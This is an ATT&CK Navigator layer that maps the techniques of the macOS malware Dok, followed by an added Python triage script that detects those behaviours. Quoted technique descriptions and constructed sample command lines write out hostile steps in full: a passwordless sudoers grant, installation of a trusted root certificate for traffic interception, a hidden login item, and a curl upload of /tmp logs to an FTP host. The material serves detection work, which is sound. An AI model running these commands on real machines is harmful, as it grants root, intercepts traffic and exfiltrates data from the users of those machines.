{"description": "Enterprise techniques used by Dok, ATT&CK software S0281 (v2.0)", "name": "Dok (S0281)", "domain": "enterprise-attack", "versions": {"layer": "4.5", "attack": "17", "navigator": "5.1.0"}, "techniques": [{"techniqueID": "T1548", "showSubtechniques": true}, {"techniqueID": "T1548.003", "comment": "[Dok](https://attack.mitre.org/software/S0281) adds admin ALL=(ALL) NOPASSWD: ALL to the /etc/sudoers file.(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1557", "comment": "[Dok](https://attack.mitre.org/software/S0281) proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1547", "showSubtechniques": true}, {"techniqueID": "T1547.015", "comment": "[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to install a login item by sending Apple events to the System Events process.(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1059", "showSubtechniques": true}, {"techniqueID": "T1059.002", "comment": "[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to create a login item for persistence.(Citation: objsee mac malware 2017)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1543", "showSubtechniques": true}, {"techniqueID": "T1543.001", "comment": "[Dok](https://attack.mitre.org/software/S0281) installs two LaunchAgents to redirect all network traffic with a randomly generated name for each plist file maintaining the format com.random.name.plist.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1048", "showSubtechniques": true}, {"techniqueID": "T1048.003", "comment": 
"[Dok](https://attack.mitre.org/software/S0281) exfiltrates logs of its execution stored in the /tmp folder over FTP using the curl command.(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1222", "showSubtechniques": true}, {"techniqueID": "T1222.002", "comment": "[Dok](https://attack.mitre.org/software/S0281) gives all users execute permissions for the application using the command chmod +x /Users/Shared/AppStore.app.(Citation: CheckPoint Dok)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1056", "showSubtechniques": true}, {"techniqueID": "T1056.002", "comment": "[Dok](https://attack.mitre.org/software/S0281) prompts the user for credentials.(Citation: objsee mac malware 2017)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1027", "showSubtechniques": true}, {"techniqueID": "T1027.002", "comment": "[Dok](https://attack.mitre.org/software/S0281) is packed with a UPX executable packer.(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1090", "showSubtechniques": true}, {"techniqueID": "T1090.003", "comment": "[Dok](https://attack.mitre.org/software/S0281) downloads and installs [Tor](https://attack.mitre.org/software/S0183) via homebrew.(Citation: objsee mac malware 2017)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1553", "showSubtechniques": true}, {"techniqueID": "T1553.004", "comment": "[Dok](https://attack.mitre.org/software/S0281) installs a root certificate to aid in [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) actions using the command add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename.(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}], "gradient": {"colors": ["#ffffff", 
"#66b1ff"], "minValue": 0, "maxValue": 1}, "legendItems": [{"label": "used by Dok", "color": "#66b1ff"}]}
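Worked example added by the editor; it is not code from ATT&CK, from the Dok samples, or from the cited analyses. It turns the technique comments in the layer above into host-triage checks: a sudoers parser for the "admin ALL=(ALL) NOPASSWD: ALL" grant (T1548.003), a baseline diff for unexpected user LaunchAgents (T1543.001), and command-line rules for the chmod, add-trusted-cert, curl-over-FTP, Homebrew Tor and AppleScript login-item behaviours (T1222.002, T1553.004, T1048.003, T1090.003, T1547.015). Assumptions not stated in the layer: add-trusted-cert is invoked through the macOS `security` binary (that is the real CLI that provides the subcommand); the curl rule only requires a /tmp path and an ftp:// URL on the same command line, since the layer does not quote the exact flags; the AppleScript rule keys on the generic "System Events" plus "login item" phrasing. All sample command lines, the sudoers text and the LaunchAgent names are constructed for the example and are not real Dok indicators.

```python
"""Map macOS process command lines, a sudoers file and a LaunchAgents listing to the
Dok technique IDs listed in this ATT&CK Navigator layer.

Added example, not ATT&CK or Dok code. All sample inputs below are constructed.
"""
import re
from typing import Dict, Iterable, List

# T1548.003: the sudoers grant Dok appends, 'admin ALL=(ALL) NOPASSWD: ALL'.
# Group 1 captures the user or %group that gets passwordless root.
SUDOERS_NOPASSWD_RE = re.compile(
    r"^\s*(\S+)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s*NOPASSWD:\s*ALL\s*$"
)

# (technique ID from the layer, regex over one process command line).
# Assumption: add-trusted-cert is reached via the 'security' binary; the curl and
# osascript shapes are the editor's generalisation of the layer's wording.
COMMAND_RULES = [
    ("T1222.002", re.compile(r"\bchmod\s+\+x\s+/Users/Shared/AppStore\.app\b")),
    ("T1553.004", re.compile(
        r"\bsecurity\s+add-trusted-cert\b.*-r\s+trustRoot\b.*System\.keychain")),
    ("T1048.003", re.compile(r"\bcurl\b(?=.*\bftp://)(?=.*/tmp/)")),
    ("T1090.003", re.compile(r"\bbrew\s+install\s+tor\b")),
    ("T1547.015", re.compile(r"\bosascript\b.*System Events.*login item", re.IGNORECASE)),
]


def find_nopasswd_sudoers(sudoers_text: str) -> List[str]:
    """Return the principals granted 'ALL=(ALL) NOPASSWD: ALL' in a sudoers file.

    Comment lines are skipped; the ordinary '%admin ALL=(ALL) ALL' line that ships
    with macOS does not match because it lacks the NOPASSWD tag.
    """
    hits: List[str] = []
    for line in sudoers_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        match = SUDOERS_NOPASSWD_RE.match(line)
        if match:
            hits.append(match.group(1))
    return hits


def new_launch_agents(current: Iterable[str], baseline: Iterable[str]) -> List[str]:
    """T1543.001: Dok drops two LaunchAgents with random com.<x>.<y>.plist names.

    The names themselves carry no fixed indicator, so the practical check is a diff
    against a known-good baseline of the user's LaunchAgents directory.
    """
    return sorted(set(current) - set(baseline))


def triage(command_lines: Iterable[str], sudoers_text: str,
           launch_agents: Iterable[str] = (), baseline: Iterable[str] = ()) -> Dict[str, List[str]]:
    """Return {technique_id: [evidence, ...]} for every layer behaviour observed."""
    findings: Dict[str, List[str]] = {}
    for line in command_lines:
        for technique_id, rule in COMMAND_RULES:
            if rule.search(line):
                findings.setdefault(technique_id, []).append(line)
    for who in find_nopasswd_sudoers(sudoers_text):
        findings.setdefault("T1548.003", []).append(
            f"sudoers grants {who} ALL=(ALL) NOPASSWD: ALL")
    for name in new_launch_agents(launch_agents, baseline):
        findings.setdefault("T1543.001", []).append(name)
    return findings


# Constructed sample input (not real telemetry, not real Dok indicators).
SAMPLE_COMMANDS = [
    "chmod +x /Users/Shared/AppStore.app",
    "security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename",
    "curl -T /tmp/dok.log ftp://198.51.100.7/upload/",
    "brew install tor",
    "osascript -e 'tell application \"System Events\" to make login item at end "
    "with properties {path:\"/Users/Shared/AppStore.app\", hidden:true}'",
    "ls -la /Users/Shared",  # benign line; must not match anything
]
SAMPLE_SUDOERS = """# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
admin ALL=(ALL) NOPASSWD: ALL
"""
BASELINE_LAUNCH_AGENTS = {"com.google.keystone.agent.plist"}
SAMPLE_LAUNCH_AGENTS = BASELINE_LAUNCH_AGENTS | {"com.hvmv.qpxz.plist", "com.tzlk.wqrn.plist"}

if __name__ == "__main__":
    for technique_id, evidence in sorted(
            triage(SAMPLE_COMMANDS, SAMPLE_SUDOERS,
                   SAMPLE_LAUNCH_AGENTS, BASELINE_LAUNCH_AGENTS).items()):
        print(technique_id, "<-", evidence)
```

On a live host the inputs would come from /etc/sudoers (read as root), a listing of ~/Library/LaunchAgents, and process-creation events from an EDR or unified log; the rules are deliberately narrow to the command shapes the layer describes, so treat a hit as a pivot point rather than a verdict, and expect the curl and osascript rules to need tuning against the host's normal automation.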